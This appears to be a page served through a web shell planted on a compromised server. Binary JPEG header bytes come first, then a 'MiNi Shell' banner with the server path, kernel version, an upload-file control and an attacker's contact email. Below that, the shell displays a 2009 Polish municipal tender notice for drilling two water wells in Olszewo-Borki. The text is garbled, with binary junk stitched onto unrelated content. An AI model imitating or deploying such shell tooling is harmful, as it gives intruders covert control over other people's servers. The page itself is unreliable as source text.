JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090601/174554-N-2009.html

<p class="kh_header"><b>Olszewo-Borki: Wykonanie otworu hydrogeologicznego (studziennego) nr 1 i nr 2 w miejscowości Stepna Stara, gmina Olszewo - Borki, powiat ostrołęcki, województwo mazowieckie, zlewnia Narwi</b><br>
<b>Numer ogłoszenia: 174554 - 2009; data zamieszczenia: 01.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olszewo-Borki , ul. Władysława Broniewskiego 13, 07-415 Olszewo-Borki, woj. mazowieckie, tel. 029 761-31-07, faks 029 7613223.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.olszewo-borki.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.olszewo-borki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie otworu hydrogeologicznego (studziennego) nr 1 i nr 2 w miejscowości Stepna Stara, gmina Olszewo - Borki, powiat ostrołęcki, województwo mazowieckie, zlewnia Narwi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prace należy wykonać zgodnie i w oparciu o projekt prac geologicznych dołączony do niniejszej SIWZ 
i obejmują w szczególności:
1)	Lokalizacja i charakter otworu.
Wykonanie systemem obrotowym otworów Nr 1 i Nr 2 do głębokości 75,0 m (+max. 30%) świdrem O508mm z zabudową filtrów PVC o średnicy zewnętrznej części roboczej 280 mm, przeprowadzenie próbnego pompowania każdego otworu w wymiarze ok. 72 godz., wykonanie analiz fizykochemicznych i bakteriologicznych wody oraz opracowanie dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne ujęcia. Otwór Nr 1 będzie spełniał rolę studni podstawowej a Nr 2 - awaryjnej, do pompowania pojedynczego.
2)	Zamykanie horyzontów wodonośnych
Zamykanie poziomów wodonośnych należy przeprowadzić przez posadowienie jednego korka compactonitowego na głębokości 30 - 35 m. 
3)	 Opróbowanie, obserwacje i badania terenowe.
Z każdej napotkanej warstwy należy pobierać próbki czasowego przechowywania do skrzynek, z częstotliwością nie rzadszą niż co 2m, a z warstwy wodonośnej nie rzadziej niż co 1m. Próbki będzie można zlikwidować po zatwierdzeniu powykonawczej dokumentacji hydrogeologicznej. Obserwacje będą dotyczyły profilu geologicznego i jego litologicznej zmienności, parametrów warstwy wodonośnej, zachowania się zwierciadła wody, jego położenia i stabilizacji. W warstwie wodonośnej należy ustabilizować statyczny poziom zwierciadła wody w czasie nie krótszym niż 8 godzin. Po odwierceniu otworu i jego zafiltrowaniu należy przeprowadzić pompowanie oczyszczające do całkowitego oczyszczenia wody z zawiesiny mechanicznej oraz ustabilizowania depresji w czasie nie krótszym niż 24 godzin. Wydajność pompowania oczyszczającego powinna być zbliżona do obliczonej  maksymalnej przepustowości filtra. Po pompowaniu oczyszczającym należy studnię zachlorować na okres nie krótszy  niż 24 godziny, a następnie przeprowadzić pompowanie kontrolne w 3 cyklach dynamicznych z wydajnościami równymi 1/3, 2/3 i 3/3 wydajności maksymalnych. Czas trwania każdego cyklu dynamicznego nie może być krótszy niż 16 godzin od chwili stabilizacji depresji. Po zakończeniu pompowania pomiarowego należy przeprowadzić stabilizację zwierciadła wody do poziomu statycznego. W czasie pompowań studni nr 2 na każdym cyklu prowadzi  pomiary lustra wody w studni nr 1.Prace geologiczne należy prowadzić pod dozorem uprawnionego hydrologa, a wszystkie wyniki dokładnie odnotować w dokumentach budowy.
4)	 Roboty geodezyjne
Wykonany otwór studzienny oraz elementy obudowy należy zaniwelować w nawiązaniu do sieci układu państwowego.
5)	 Badania laboratoryjne.
Badania laboratoryjne powinny objąć wykonanie analizy jakościowej wody. Pod koniec pompowania pomiarowego studni nr 1 należy pobrać próby wody do badań określających  jakość fizyko - chemiczną i bakteriologiczną (także ze studni nr 2).
6)	 Forma dokumentacji i termin przedstawienia jej do zatwierdzenia. 
Opracowaniem wynikowym z przeprowadzonych prac będzie Dokumentacja hydrogeologiczna dla ustalenia zasobów eksploatacyjnych ujęcia, 1 egz. Karty informacyjnej  dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne ujęcia wód podziemnych nie będących kopalinami (wraz z wersją elektroniczną). Dokumentację należy przedstawić w 4 egzemplarzach właściwemu organowi państwowej administracji geologicznej (Marszałek Województwa Mazowieckiego) w terminie dwóch miesięcy po zakończeniu prac terenowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.22.20-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium w wysokości: 1.600,00 zł (słownie: jeden tysiąc sześćset złotych),  które może być wnoszone w: 
a)	pieniądzu, 
b)	poręczeniach bankowych,
c)	gwarancjach bankowych, 
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa wart. 6 ust. 3 pkt 4 lit. b ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
2.	Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy Zamawiającego: Bank Spółdzielczy w Ostrołęce nr rachunku: 44 8922 0009 0000 0361 2000 0030 z adnotacją Wykonanie otworu hydrogeologicznego- postępowanie RIGKiD.341/5/09.
3.	Wadium musi obejmować okres związania ofertą.
4.	Wadium musi być wniesione przed upływem terminu składania ofert (w przypadku wpłaty przelewem liczy się data wpływu na konto Zamawiającego). 
5.	Wykonawca, który nie wniósł wadium w wymaganym terminie oraz w formie określonej niniejszą SIWZ, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą. 
6.	Zamawiający zwraca wadium w terminie i zgodnie z art. 46 pzp.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wymagania stawiane Wykonawcy:
1)	Wykonawca odpowiedzialny jest za jakość, zgodność z warunkami technicznymi i jakościowymi opisywanymi dla przedmiotu zamówienia.
2)	Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
3)	Ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
4)	Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych do sprawnego i terminowego wykonania zamówienia.
5)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonania przedmiotu zamówienia.
2.	O udzielenie zamówienie mogą ubiegać się Wykonawcy potwierdzający spełnienie warunków:
1)	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.;
2)	Posiadający niezbędną wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, tj.:
a)	Wykonawca w okresie ostatnich 3 lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej jedno zamówienie z zakresu prac geologicznych odpowiadające swoim rodzajem (wykonanie co najmniej 2 odwiertów studziennych o głębokości co najmniej 95mb wraz z obudową studni, wykonaniem pompowania, badań laboratoryjnych wody i opracowaniem dokumentacji) i o wartości zamówienia co najmniej równej lub przekraczającej przedmiot aktualnego zamówienia;
b)	Wykonawca ma do dyspozycji personel do wykonania zadania - tj. co najmniej 1 osobę, która może kierować wierceniami i posiada do tego stosowne uprawnienia, a także wykonała co najmniej jedno tożsame zadanie jako kierownik analogicznych prac geologicznych.
c)	Wykonawca posiada niezbędne maszyny i urządzenia lub ma możliwość skorzystania z usług w tym zakresie (wynajem).
3)	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.
a)	Wykonawca posiada środki finansowe lub zdolność kredytową w kwocie minimum 180.000,00zł,
b)	Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzenia działalności,
c)	Wykonawca nie zalega z płatnościami na rzecz ZUS lub KRUS i Urzędu Skarbowego.
4)	Niepodlegający wykluczeniu z postępowania o udzielenie zamówienia z art. 24 ust. 1 i 2 Prawa zamówień publicznych.
3.	 Z ubiegania się o zamówienia publicznego wyklucza się Wykonawców, którzy:
1)	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 Prawa zamówień publicznych opisanych  w p. pkt 1.1. do 1.4.
2)	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych.
3)	Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych Wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
4)	Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
5)	Nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków z zastrzeżeniem art. 26 ust.3.	
6)	Nie zgodzili się na przedłużenie okresu związania ofertą.
7)	Nie złożyli wyjaśnień do dokumentów lub oświadczeń będących częścią oferty zgodnie z art. 26 ust. 1 ustawy Prawo zamówień publicznych w terminie wyznaczonym przez Zamawiającego. 
4.	Zamawiający odrzuca ofertę jeżeli:
1)	jest niezgodna z ustawą Pzp,
2)	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Pzp,.
3)	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, 
4)	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
5)	została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6)	zawiera błędy w obliczeniu ceny,
7)	Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
8)	jest nieważna na podstawie odrębnych przepisów.
9)	Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	 Zawartość oferty
1)	Formularz oferty wg wzoru stanowiącego Załącznik Nr 1 do SIWZ
2)	Kosztorys ofertowy wg wzoru stanowiącego Załącznik Nr 2/1 i 2/2 do SIWZ
3)	Dowód wniesienia wadium 
4)	Oświadczenie Wykonawcy o dokonaniu wizji lokalnej wg wzoru stanowiącego Załącznik Nr  3 do SIWZ
5)	Oświadczenie o realizacji zadania środkami własnymi wg wzoru stanowiącego Załącznik Nr 4 do SIWZ
6)	Oświadczenie wykonawcy o spełnieniu warunków w związku z art. 22 i 24 Ustawy Prawo zamówień publicznych wg wzoru stanowiącego Załącznik Nr 5/1 i 5/2 do SIWZ.
7)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Działalność Oferenta musi być zgodna z przedmiotem zamówienia.
8)	Zaświadczenie właściwego Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4 - 8 i pkt. 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
10)	Informacja z banku, w której potwierdza się wielkość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę min. 180.000,00 zł.
11)	Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia i kwalifikacje - Wykonawca udokumentuje, iż dysponuje osobami posiadającymi stosowne kwalifikacje do wykonania zadań niezbędnych do realizacji zamówienia (załączyć wykaz osób wraz z kopiami uprawnień) wg wzoru stanowiącego Załącznik Nr 6 do SIWZ.
12)	Wykaz co najmniej jednego zamówienia wykonanego w ciągu ostatnich trzech lat, odpowiadającego swoim rodzajem i wartością pracom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że prace te zostały wykonane z należytą starannością. Załączyć referencje, które w sposób jednoznaczny udokumentują wykonanie z należytą starannością zleconych prac, wg wzoru stanowiącego Załącznik Nr 7 do SIWZ.
13)	Polisa lub inny dokument ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
14)	Wypełniony formularz umowy i parafowany na każdej stronie wg wzoru stanowiącego Załącznik Nr 8 do SIWZ.
2.	Wymienione w niniejszej SIWZ dokumenty powinny być oryginałami albo kopiami potwierdzonymi za zgodność z oryginałem przez upoważnionych przedstawicieli Wykonawcy. Dokumenty takie jak wypis z rejestru i informacja z rejestru karnego powinny posiadać aktualną datę ważności, co najmniej do dnia złożenia ofert, a w przypadku jej braku data wystawienia lub aktualizacji dokumentu nie może być wcześniejsza niż 6 miesięcy od daty składania ofert określonej w niniejszej SIWZ. W przypadku zaświadczenia z Urzędu Skarbowego, zaświadczenia z Zakładu Ubezpieczeń Społecznych oraz informacji z banku, ich data wystawienia nie może być wcześniejsza niż 3 miesiące od daty składania ofert. 
3.	Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
1)	Zamiast dokumentów, o których mowa w ust. 1 pkt. 7, 8 i 9, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4.	Dokumenty wymagane w przypadku składania oferty wspólnej: 
1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
2)	Oferta winna zawierać: oświadczenia i dokumenty dla każdego partnera z osobna.
5.	Postanowienia dotyczące składanych dokumentów
1)	Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę/osoby uprawnione do podpisania oferty z dopiskiem - za zgodność z oryginałem.
2)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
6.	Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie dokumentu w niewłaściwej formie (kopia dokumentu nie poświadczona za zgodność z oryginałem) spowoduje wykluczenie Wykonawcy z postępowania lub odrzucenie oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.olszewo-borki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Olszewo-Borki
Ul. Wł. Broniewskiego 13
07-415 Olszewo-Borki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2009 godzina 10:00, miejsce: Urząd Gminy Olszewo-Borki
Ul. Wł. Broniewskiego 13
07-415 Olszewo-Borki
pok. 2A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com